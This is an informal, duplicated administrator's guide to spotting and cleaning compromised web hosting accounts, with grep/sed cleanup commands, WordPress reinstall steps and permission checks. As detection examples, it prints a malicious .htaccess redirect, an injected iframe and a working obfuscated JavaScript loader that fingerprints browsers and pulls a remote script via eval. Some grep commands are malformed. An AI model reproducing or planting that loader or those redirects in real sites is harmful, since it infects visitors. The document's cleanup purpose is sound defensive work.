How to find hack sites.
1, Check for the entry "eval(base64_decode" in the public_html. You can find all the files containg this from the below script,
=-=-=--=-==-=-=--=-=-=
grep -irl 'eval(base64_decode("DQplcnJvcl' ./ > HACKS
-==-=--==-=-=--=-=-=-=-=
2. Now all the file containing this entry can be replaced using the below script backing up the current content,
=-=--==-=--=--=-=-=-=
for i in `cat HACKS`; do cp -frp $i $i"-HACKED"; done
for i in `cat HACKS`; do sed -i 's#<?php.*eval(base64_decode("DQplcnJvcl.*));#<?php#' $i; done
=-=-=-=-=-=-=-=--=
Steps to prevent hacking,
1. Change the password of cPanel/FTP/Email
2. Scan the Computer.
3. Check the .htaccess for a redirect rule configured to malicious site as below,
=-==--=-=-=-=-=
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
=-=-=-=-=-=-=-
4. Clean wordpress site.
>> Move the current wordpress content to quarantine folder. Reinstall wordpress. Scan the old plugins and theme folder. Copy that to newly installed location. Find the db infoormation from old
wp-config file abd copy to new location.
How to check who has logged to server.
-==--=-=-=-=
last -if /var/log/wtmp | grep youruser | awk '{print $3}' | sort | uniq -c
=-=-=--=-==-
How to prevent others writable,
=-=-=-=-
find . -type d -perm -o=w -print -exec chmod modeyouwant {} \;
-==-=-=-
will check for the files with execute permission and modify the permission.
Check for the files modified recently using the below script,
=--=-==-=-=-
find /usr/local/apache/domlogs/ ! -name "log" -mtime -3
-=-=-==--=-=-=
Code can be injected soon after the iframe, in the format below,
=-=--==-
<body><iframe src="http://somewebsite.cn/index.php" width=135 height=131 ></iframe><center>
=--==-
here the site will be redirected to malicious site "http://somewebsite.cn/index.php"
This iframe contain files can be find from the below script,
=---==--=-=-=
grep ri body * | grep i iframe | grep i hidden > hidden-iframes.txt
-==-=--=-=
Sometime, unescape() method to replace characters with their hexadecimal value equivalent, and concatenated variables to construct full text strings as shown below,
=-=-=--=
<script language=javascript><!--
(function(){var hiT='%';var Awi5N='var:20a:3d:22:53cr:69ptE:6e:67ine:22:2cb:3d:22Ve:72sion()+:22:2c:6a:3d:22:22:2c:75:3dnavi:67ator:2eu:73erAg:65nt:3bif:28(u:2eind:65:78Of:28:22C:68ro:6de:22:29:3c0):26:26:28u:2eindex:4ff(:22Wi:6e:22):3e0):26:26:28u:2eind:65xOf:28:22:4eT:206:22):3c0):26:26(docu:6d:65nt:2ec:6fo:6bie:2e:69:6e:64:65xOf(:22m:69ek:3d1:22):3c0:29:26:26(ty:70:65o:66(:7arvz:74s:29:21:3d:74ypeof:28:22A:22))):7bzr:76:7ats:3d:22A:22:3beva:6c(:22if(window:2e:22+a:2b:22:29j:3dj+:22+a+:22Major:22+b+a+:22:4di:6eor:22+b+a+:22:42:75i:6c:64:22:2bb+:22j:3b:22:29:3bd:6fcu:6dent:2ewr:69:74e:28:22:3cscri:70t:20s:72c:3d:2f:2fmart:22:2b:22:75z:2e:63n:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2fscrip:74:3e:22:29:3b:7d';var VAIP=Awi5N.replace(/:/g,hiT);var rMQQz=unescape(VAIP);eval(rMQQz)})();
--></script>
=-=-=-=-=-
If you find the variables eval, unescape and large block of obfuscated code, the page seems to be malicious.
1, Check for the entry "eval(base64_decode" in the public_html. You can find all the files containg this from the below script,
=-=-=--=-==-=-=--=-=-=
grep -irl 'eval(base64_decode("DQplcnJvcl' ./ > HACKS
-==-=--==-=-=--=-=-=-=-=
2. Now all the file containing this entry can be replaced using the below script backing up the current content,
=-=--==-=--=--=-=-=-=
for i in `cat HACKS`; do cp -frp $i $i"-HACKED"; done
for i in `cat HACKS`; do sed -i 's#<?php.*eval(base64_decode("DQplcnJvcl.*));#<?php#' $i; done
=-=-=-=-=-=-=-=--=
Steps to prevent hacking,
1. Change the password of cPanel/FTP/Email
2. Scan the Computer.
3. Check the .htaccess for a redirect rule configured to malicious site as below,
=-==--=-=-=-=-=
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
=-=-=-=-=-=-=-
4. Clean wordpress site.
>> Move the current wordpress content to quarantine folder. Reinstall wordpress. Scan the old plugins and theme folder. Copy that to newly installed location. Find the db infoormation from old
wp-config file abd copy to new location.
How to check who has logged to server.
-==--=-=-=-=
last -if /var/log/wtmp | grep youruser | awk '{print $3}' | sort | uniq -c
=-=-=--=-==-
How to prevent others writable,
=-=-=-=-
find . -type d -perm -o=w -print -exec chmod modeyouwant {} \;
-==-=-=-
will check for the files with execute permission and modify the permission.
Check for the files modified recently using the below script,
=--=-==-=-=-
find /usr/local/apache/domlogs/ ! -name "log" -mtime -3
-=-=-==--=-=-=
Code can be injected soon after the iframe, in the format below,
=-=--==-
<body><iframe src="http://somewebsite.cn/index.php" width=135 height=131 ></iframe><center>
=--==-
here the site will be redirected to malicious site "http://somewebsite.cn/index.php"
This iframe contain files can be find from the below script,
=---==--=-=-=
grep ri body * | grep i iframe | grep i hidden > hidden-iframes.txt
-==-=--=-=
Sometime, unescape() method to replace characters with their hexadecimal value equivalent, and concatenated variables to construct full text strings as shown below,
=-=-=--=
<script language=javascript><!--
(function(){var hiT='%';var Awi5N='var:20a:3d:22:53cr:69ptE:6e:67ine:22:2cb:3d:22Ve:72sion()+:22:2c:6a:3d:22:22:2c:75:3dnavi:67ator:2eu:73erAg:65nt:3bif:28(u:2eind:65:78Of:28:22C:68ro:6de:22:29:3c0):26:26:28u:2eindex:4ff(:22Wi:6e:22):3e0):26:26:28u:2eind:65xOf:28:22:4eT:206:22):3c0):26:26(docu:6d:65nt:2ec:6fo:6bie:2e:69:6e:64:65xOf(:22m:69ek:3d1:22):3c0:29:26:26(ty:70:65o:66(:7arvz:74s:29:21:3d:74ypeof:28:22A:22))):7bzr:76:7ats:3d:22A:22:3beva:6c(:22if(window:2e:22+a:2b:22:29j:3dj+:22+a+:22Major:22+b+a+:22:4di:6eor:22+b+a+:22:42:75i:6c:64:22:2bb+:22j:3b:22:29:3bd:6fcu:6dent:2ewr:69:74e:28:22:3cscri:70t:20s:72c:3d:2f:2fmart:22:2b:22:75z:2e:63n:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2fscrip:74:3e:22:29:3b:7d';var VAIP=Awi5N.replace(/:/g,hiT);var rMQQz=unescape(VAIP);eval(rMQQz)})();
--></script>
=-=-=-=-=-
If you find the variables eval, unescape and large block of obfuscated code, the page seems to be malicious.